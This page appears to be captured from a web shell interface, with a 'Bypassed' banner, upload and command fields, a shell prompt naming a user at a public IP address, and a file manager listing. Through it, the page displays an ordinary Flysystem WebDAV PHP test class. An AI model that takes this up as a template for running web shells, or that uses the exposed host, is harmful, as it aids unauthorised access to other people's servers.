404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@3.139.69.53: ~ $
<?php

declare(strict_types=1);

namespace League\Flysystem\WebDAV;

use League\Flysystem\FilesystemAdapter;
use Sabre\DAV\Client;

class SabreServerTest extends WebDAVAdapterTestCase
{
    protected static function createFilesystemAdapter(): FilesystemAdapter
    {
        $client = new Client(['baseUri' => 'http://localhost:4040/']);

        return new WebDAVAdapter($client, 'directory/prefix');
    }
}

Filemanager

Name Type Size Permission Actions
.github Folder 0755
resources Folder 0755
.gitattributes File 207 B 0644
ByteMarkWebDAVServerTest.php File 520 B 0644
README.md File 310 B 0644
SabreServerTest.php File 428 B 0644
UrlPrefixingClientStub.php File 569 B 0644
WebDAVAdapter.php File 15.6 KB 0644
WebDAVAdapterTestCase.php File 3.58 KB 0644
composer.json File 568 B 0644